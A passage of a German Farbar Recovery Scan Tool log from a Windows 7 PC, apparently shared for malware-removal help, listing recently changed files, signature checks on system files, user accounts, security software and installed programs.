2017-04-27 19:39 - 2017-04-27 19:49 - 00000000 ____D C:\Users\Markus\AppData\Local\Mozilla
2017-04-27 17:42 - 2017-04-27 17:42 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Bluetooth-Geräte
2017-04-27 16:44 - 2017-04-27 16:44 - 00000000 _____ C:\Windows\system32\__00000001400ACBF1__C0000005.dmp
2017-04-27 16:28 - 2017-04-27 16:28 - 00000000 ____D C:\Windows\system32\SSL
2017-04-27 16:28 - 2017-04-27 16:28 - 00000000 _____ C:\Windows\system32\__000000013FF6CBF1__C0000005.dmp
2017-04-26 19:27 - 2017-05-16 23:02 - 00000000 ____D C:\Users\Markus\AppData\Local\inst

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-25 22:00 - 2012-01-06 19:54 - 00699666 _____ C:\Windows\system32\perfh007.dat
2017-05-25 22:00 - 2012-01-06 19:54 - 00149774 _____ C:\Windows\system32\perfc007.dat
2017-05-25 22:00 - 2009-07-14 07:13 - 01620612 _____ C:\Windows\system32\PerfStringBackup.INI
2017-05-25 22:00 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\inf
2017-05-25 21:56 - 2012-11-14 15:17 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Skype
2017-05-25 21:55 - 2017-04-23 13:28 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-05-25 21:55 - 2015-12-25 20:14 - 00808960 ___SH C:\Users\Markus\Desktop\Thumbs.db
2017-05-25 21:55 - 2012-11-07 06:17 - 00000000 ____D C:\ProgramData\NVIDIA
2017-05-25 21:54 - 2015-11-07 10:17 - 00000000 ____D C:\Users\Markus\AppData\LocalLow\Temp
2017-05-25 21:40 - 2009-07-14 06:45 - 00031536 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-05-25 21:40 - 2009-07-14 06:45 - 00031536 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-05-24 19:04 - 2012-12-09 23:31 - 00000000 ____D C:\Users\Markus\Documents\Outlook-Dateien
2017-05-24 06:14 - 2012-12-25 12:58 - 00000000 ____D C:\Users\Markus\AppData\Local\CrashDumps
2017-05-23 21:47 - 2013-08-15 22:57 - 00000000 ____D C:\Windows\system32\MRT
2017-05-23 19:52 - 2012-11-07 10:08 - 00001048 ____H C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-05-23 19:51 - 2012-11-11 18:05 - 132223576 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-05-22 20:54 - 2009-07-14 07:08 - 00032632 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2017-05-22 06:47 - 2012-11-18 20:44 - 00000000 ____D C:\Users\Markus\Word
2017-05-21 19:44 - 2017-04-21 11:29 - 00000000 ____D C:\Windows\system32\log
2017-05-21 14:35 - 2012-11-07 10:08 - 00000000 ____D C:\Users\Markus
2017-05-21 14:34 - 2015-01-18 20:27 - 00000000 ____D C:\Users\Alina
2017-05-21 14:33 - 2015-06-29 19:27 - 00000000 ____D C:\Users\Markus\Kontoauszuege
2017-05-21 08:53 - 2017-04-21 07:25 - 00000000 ____D C:\Windows\Update
2017-05-21 08:53 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\LiveKernelReports
2017-05-20 18:56 - 2016-02-03 21:30 - 00000461 _____ C:\Users\Markus\Desktop\Smart Camera.ini
2017-05-20 17:26 - 2012-12-17 23:10 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-20 11:55 - 2013-12-01 12:45 - 00000000 ____D C:\Program Files\Avira Secure Backup
2017-05-19 16:57 - 2014-02-03 20:32 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-19 16:56 - 2013-12-01 12:45 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Avira
2017-05-19 16:33 - 2015-09-01 07:04 - 00000000 ____D C:\Program Files\Common Files\AV
2017-05-17 14:33 - 2013-08-04 21:34 - 00000000 ____D C:\Windows\system32\appmgmt
2017-05-17 09:19 - 2013-04-06 17:26 - 00000000 ____D C:\Users\Markus\AppData\Local\FreePDF_XP
2017-05-13 19:31 - 2012-11-08 21:56 - 00803320 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-05-13 19:31 - 2012-11-08 21:56 - 00144888 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-05-13 19:31 - 2012-11-08 21:56 - 00004366 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-05-13 19:31 - 2012-11-08 21:55 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-05-13 19:31 - 2012-11-08 21:55 - 00000000 ____D C:\Windows\system32\Macromed
2017-05-13 11:56 - 2013-01-12 19:05 - 00000000 ____D C:\Users\Markus\AppData\Local\ElevatedDiagnostics
2017-05-13 11:56 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\system32\NDF
2017-05-12 19:33 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\rescache
2017-05-12 17:55 - 2009-07-14 06:45 - 00423960 _____ C:\Windows\system32\FNTCACHE.DAT
2017-05-12 17:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\PolicyDefinitions
2017-05-12 17:37 - 2012-01-26 23:54 - 01594892 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2017-05-08 21:06 - 2014-12-26 19:13 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-05-07 09:39 - 2012-11-07 10:10 - 00000000 ____D C:\Windows\System32\Tasks\Fujitsu
2017-05-03 14:34 - 2017-04-21 11:29 - 00000000 _____ C:\Windows\SysWOW64\11
2017-05-02 20:05 - 2015-09-13 10:32 - 00000000 ____D C:\Users\Alina\Kontoauszug
2017-05-02 20:01 - 2015-10-01 18:25 - 00000000 ____D C:\Users\Paul\Kontoauszuege
2017-05-02 20:01 - 2015-10-01 18:25 - 00000000 ____D C:\Users\Paul
2017-05-01 19:59 - 2013-09-29 11:20 - 00000000 ____D C:\Program Files\PDFCreator
2017-05-01 19:58 - 2012-12-14 22:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexware
2017-05-01 17:52 - 2016-03-03 14:22 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Mp3tag
2017-05-01 17:40 - 2013-09-03 19:51 - 01567232 ___SH C:\Users\Markus\Downloads\Thumbs.db
2017-05-01 09:33 - 2012-11-18 20:43 - 00000000 ____D C:\Users\Markus\Haus
2017-04-30 18:00 - 2013-10-29 15:43 - 00000000 ____D C:\Users\Markus\AppData\Local\CUSTPDF Writer
2017-04-30 18:00 - 2012-11-18 20:43 - 00000000 ____D C:\Users\Markus\Power Point
2017-04-29 17:18 - 2012-11-07 10:08 - 00003542 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2017-04-29 17:18 - 2012-11-07 10:08 - 00003414 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2017-04-27 19:19 - 2012-11-08 15:03 - 00000000 ____D C:\Users\Markus\AppData\Local\Google

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2013-09-29 12:20 - 2013-12-01 11:20 - 0000093 _____ () C:\Users\Markus\AppData\Roaming\WB.CFG
2013-09-29 12:20 - 2013-12-01 11:20 - 0000006 _____ () C:\Users\Markus\AppData\Roaming\WBPU-TTL.DAT
2012-11-27 22:00 - 2012-11-27 22:00 - 0003584 _____ () C:\Users\Markus\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2016-01-30 21:00 - 2016-01-30 21:00 - 0003339 _____ () C:\Users\Markus\AppData\Local\recently-used.xbel
2013-04-06 17:15 - 2013-04-06 17:15 - 0000057 _____ () C:\ProgramData\Ament.ini

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-05-23 19:47

==================== Ende von FRST.txt ============================

--- --- ---

[/CODE]

Code:

ATTFilter

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 24-05-2017
durchgeführt von Markus (25-05-2017 22:02:22)
Gestartet von C:\FRST\FRST-OlderVersion
Windows 7 Professional Service Pack 1 (X64) (2012-11-07 08:08:14)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3526156030-524322557-4044303751-500 - Administrator - Disabled)
Gast (S-1-5-21-3526156030-524322557-4044303751-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3526156030-524322557-4044303751-1003 - Limited - Enabled)
Markus (S-1-5-21-3526156030-524322557-4044303751-1001 - Administrator - Enabled) => C:\Users\Markus

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

64 Bit HP CIO Components Installer (Version: 8.2.4 - Hewlett-Packard) Hidden
AAVUpdateManager (HKLM-x32\...\{AFA42FE1-A5C3-485F-9180-BFCF5BF1F1C3}) (Version: 18.00.0000 - Wolters Kluwer Deutschland GmbH)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe Flash Player 25 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
CANON iMAGE GATEWAY MyCamera Download Plugin (HKLM-x32\...\MyCamera Download Plugin) (Version: 3.1.0.1 - Canon Inc.)
CANON iMAGE GATEWAY Task for ZoomBrowser EX (HKLM-x32\...\CANON iMAGE GATEWAY Task) (Version: 1.8.0.1 - Canon Inc.)
Canon Internet Library for ZoomBrowser EX (HKLM-x32\...\Canon Internet Library for ZoomBrowser EX) (Version: 1.7.0.1 - Canon Inc.)
Canon MOV Decoder (HKLM-x32\...\Canon MOV Decoder) (Version: 1.7.0.6 - Canon Inc.)
Canon MOV Encoder (HKLM-x32\...\Canon MOV Encoder) (Version: 1.5.0.3 - Canon Inc.)
Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\...\MovieEditTask) (Version: 3.6.0.5 - Canon Inc.)
Canon RAW Codec (HKLM-x32\...\Canon RAW Codec) (Version: 1.8.0.68 - Canon Inc.)
Canon Utilities Digital Photo Professional 3.9 (HKLM-x32\...\DPP) (Version: 3.9.1.0 - Canon Inc.)
Canon Utilities EOS Utility (HKLM-x32\...\EOS Utility) (Version: 2.9.0.0 - Canon Inc.)
Canon Utilities PhotoStitch (HKLM-x32\...\PhotoStitch) (Version: 3.1.22.46 - Canon Inc.)
Canon Utilities Picture Style Editor (HKLM-x32\...\Picture Style Editor) (Version: 1.8.0.0 - Canon Inc.)
Canon Utilities WFT Utility (HKLM-x32\...\WFTK) (Version: 3.5.1.1 - Canon Inc.)
Canon Utilities ZoomBrowser EX (HKLM-x32\...\ZoomBrowser EX) (Version: 6.6.0.23 - Canon Inc.)
Canon ZoomBrowser EX Memory Card Utility (HKLM-x32\...\ZoomBrowser EX Memory Card Utility) (Version: 1.4.0.4 - Canon Inc.)
Control ActiveX de Windows Live Mesh para conexiones remotas (HKLM-x32\...\{04668DF2-D32F-4555-9C7E-35523DCD6544}) (Version: 15.4.5722.2 - Microsoft Corporation)
Contrôle ActiveX Windows Live Mesh pour connexions à distance (HKLM-x32\...\{55D003F4-9599-44BF-BA9E-95D060730DD3}) (Version: 15.4.5722.2 - Microsoft Corporation)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
EDEKA Foto (HKLM-x32\...\EDEKA Foto) (Version: 5.1.6 - CEWE Stiftung u Co. KGaA)
FJ Camera (HKLM-x32\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 5.8.52032.0_WHQL - Sonix)
FreePDF (Remove only) (HKLM-x32\...\FreePDF_XP) (Version:  - )
Fujitsu Hotkey Utility (HKLM-x32\...\InstallShield_{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED)
Fujitsu Hotkey Utility (x32 Version: 3.70.0.0 - FUJITSU LIMITED) Hidden
Fujitsu MobilityCenter Extension Utility (HKLM-x32\...\InstallShield_{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 3.01.00.002 - FUJITSU LIMITED)
Fujitsu MobilityCenter Extension Utility (Version: 3.01.00.002 - FUJITSU LIMITED) Hidden
Fujitsu System Extension Utility (HKLM-x32\...\InstallShield_{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED)
Fujitsu System Extension Utility (Version: 3.4.4.0 - FUJITSU LIMITED) Hidden
Galería fotográfica de Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galerie de photos Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
GPL Ghostscript (HKLM-x32\...\GPL Ghostscript 9.04) (Version: 9.04 - Artifex Software Inc.)
High-Definition Video Playback (x32 Version: 7.1.13900.47.0 - Nero AG) Hidden
HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)
HP LaserJet 200 color MFP M276 (HKLM-x32\...\{CC38C23C-7824-4DBB-AC73-997CD0BBFEC7}) (Version: 5.0.12201.1116 - Hewlett-Packard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.9572 - HP)
hpbDSService (x32 Version: 002.002.07399 - Hewlett-Packard) Hidden
hpbM276DSService (x32 Version: 001.001.05874 - Hewlett-Packard) Hidden
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
HPDXP (x32 Version: 3.0.26.8 - HP) Hidden
HPLaserJet200color-MFPM276_HelpLearnCenter_SI (HKLM-x32\...\{0F044C7A-6EE1-4F03-90AC-329AAF2FCF12}) (Version: 1.01.0000 - Hewlett-Packard)
HPLJDXPHelper (x32 Version: 020.021.004 - HP) Hidden
HPLJUTCore (x32 Version: 004.005.0001 - HP) Hidden
HPLJUTM276 (x32 Version: 3.00.0003 - HP) Hidden
hppFaxDrvM276 (x32 Version: 003.000.00002 - Hewlett-Packard) Hidden
hppLaserJetService (x32 Version: 009.027.00856 - Hewlett-Packard) Hidden
hppM276LaserJetService (x32 Version: 001.019.00639 - Hewlett-Packard) Hidden
hppSendFaxM276 (x32 Version: 003.000.00002 - Hewlett-Packard) Hidden
hpStatusAlerts (x32 Version: 050.037.00142 - Hewlett Packard) Hidden
hpStatusAlertsM276 (x32 Version: 050.034.00131 - Hewlett-Packard) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.0.1351 - Intel Corporation)
Intel(R) OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version:  - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2626 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.3.214 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{DF7756DD-656A-45C3-BA71-74673E8259A9}) (Version: 15.00.0000.0642 - Intel Corporation)
Intel® Trusted Connect Service Client (HKLM\...\{6199B534-A1B6-46ED-873B-97B0ECF8F81E}) (Version: 1.23.216.0 - Intel Corporation)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lexware buchhalter 2014 (x32 Version: 19.02.00.0181 - Haufe-Lexware GmbH & Co.KG) Hidden
Lexware online banking (x32 Version: 20.00.00.0059 - Haufe-Lexware GmbH Co.KG) Hidden
LIFEBOOK Application Panel (HKLM-x32\...\InstallShield_{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED)
LIFEBOOK Application Panel (Version: 8.3.2.0 - FUJITSU LIMITED) Hidden
LJDXPHelperUI (x32 Version: 020.021.004 - HP) Hidden
Malwarebytes Version 3.1.2.1733 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.1.2.1733 - Malwarebytes)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.6.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2012 Express LocalDB  (HKLM\...\{E4A1FDA3-689D-44DA-9B39-86BD2270F522}) (Version: 11.2.5058.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Management Objects  (x64) (HKLM\...\{43A5C316-9521-49C3-B9B6-FCE5E1005DF0}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2012 (x64) (HKLM\...\{99AC7F47-A4E0-4706-9C65-8948775C2652}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{6AFCA4E1-9B78-3640-8F72-A7BF33448200}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{90ffcee5-8608-4e94-8c18-a4feb4f83fb8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
Mp3tag v2.75 (HKLM-x32\...\Mp3tag) (Version: v2.75 - Florian Heidenreich)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.6 - F.J. Wechselberger)
Nero 10 Movie ThemePack 1 (HKLM-x32\...\{43FBAB46-5969-4200-9958-1FF81FEE506F}) (Version: 10.2.10000.11.0 - Nero AG)
Nero BurnRights 10 (HKLM-x32\...\{943CFD7D-5336-47AF-9418-E02473A5A517}) (Version: 4.2.10500.1.102 - Nero AG)
Nero CoverDesigner 10 (HKLM-x32\...\{FCF00A6E-FB58-477A-ABE9-232907105521}) (Version: 5.2.11400.11.100 - Nero AG)
Nero DiscSpeed 10 (HKLM-x32\...\{34490F4E-48D0-492E-8249-B48BECF0537C}) (Version: 6.2.10500.2.100 - Nero AG)
Nero Express 10 (HKLM-x32\...\{70550193-1C22-445C-8FA4-564E155DB1A7}) (Version: 10.2.11900.20.100 - Nero AG)
Nero InfoTool 10 (HKLM-x32\...\{F412B4AF-388C-4FF5-9B2F-33DB1C536953}) (Version: 7.2.10400.5.100 - Nero AG)
Nero MediaHub 10 (HKLM-x32\...\{1F7FB68F-52F6-46A3-B42F-38CE46295AE5}) (Version: 1.2.13200.33.100 - Nero AG)
Nero Multimedia Suite 10 Essentials (HKLM-x32\...\{ADEF1F0B-635E-4041-B50F-A510C1B4D2C5}) (Version: 10.5.10400 - Nero AG)
Nero RescueAgent 10 (HKLM-x32\...\{E337E787-CF61-4B7B-B84F-509202A54023}) (Version: 3.2.10800.9.100 - Nero AG)
Nero StartSmart 10 (HKLM-x32\...\{F61D489E-6C44-49AC-AD02-7DA8ACA73A65}) (Version: 10.2.11600.14.100 - Nero AG)
Nero Update (HKLM-x32\...\{65BB0407-4CC8-4DC7-952E-3EEFDF05602A}) (Version: 1.0.0018 - Nero AG)
NVIDIA 3D Vision Treiber 361.91 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 361.91 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.9.1.22 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.9.1.22 - NVIDIA Corporation)
NVIDIA Grafiktreiber 361.91 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 361.91 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Paint.NET v3.5.10 (HKLM\...\{529125EF-E3AC-4B74-97E6-F688A7C0F1C0}) (Version: 3.60.0 - dotPDN LLC)
PDF Architect (HKLM-x32\...\{064A929A-4DE8-40CF-A901-BD40C14E4D25}) (Version: 1.1.83.9982 - pdfforge GmbH)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.7.1 - pdfforge)
Plugfree NETWORK (HKLM\...\{7BA64D21-EE46-4a9a-8145-52B0175C3F86}) (Version: 6.2.0.1 - FUJITSU LIMITED)
Plugfree NETWORK (Version: 6.2.001 - FUJITSU LIMITED) Hidden
Power Saving Utility (HKLM-x32\...\{49A588CF-5FD4-4774-BFBF-0764287DE82B}) (Version: 32.01.10.038 - FUJITSU LIMITED)
QuickSteuer Deluxe 2016 (HKLM-x32\...\{3077FB33-83B4-4B16-9A35-CD160CD3D012}) (Version: 21.33.90 - Haufe-Lexware GmbH & Co.KG)
QuickSteuer Deluxe 2017 (HKLM-x32\...\{BC0423F1-44FC-43B2-BC77-ED912E75D64F}) (Version: 22.30.70 - Haufe-Lexware GmbH & Co.KG)
Raccolta foto di Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6526 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30129 - Realtek Semiconductor Corp.)
RedMon - Redirection Port Monitor (HKLM\...\Redirection Port Monitor) (Version:  - )
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
SHIELD Streaming (Version: 4.1.0260 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.9.1.22 - NVIDIA Corporation) Hidden
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 7.30 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.30.105 - Skype Technologies S.A.)
Smart Cutter (HKLM-x32\...\{828FFE22-A27D-4891-BF79-CE78C9E1F478}) (Version: 1.8.1 - FameRing)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.19.1 - Synaptics Incorporated)
tiptoi® Manager 3.0.9 (HKLM-x32\...\9978-5763-2995-5228) (Version: 3.0.9 - Ravensburger AG)
WIDCOMM Bluetooth Software (HKLM\...\{6E7F4CA3-B2DE-413C-A7A1-43AA5BE19EA1}) (Version: 6.5.0.3100 - Broadcom Corporation)
Windows Installer Clean Up (HKLM-x32\...\{121634B0-2F4B-11D3-ADA3-00C04F52DD52}) (Version: 3.00.00.0000 - Microsoft Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh - ActiveX-besturingselement voor externe verbindingen (HKLM-x32\...\{C32CE55C-12BA-4951-8797-0967FDEF556F}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Mesh ActiveX control for remote connections (HKLM-x32\...\{C5398A89-516C-4DAF-BA07-EE7949090E56}) (Version: 15.4.5722.2 - Microsoft Corporation)
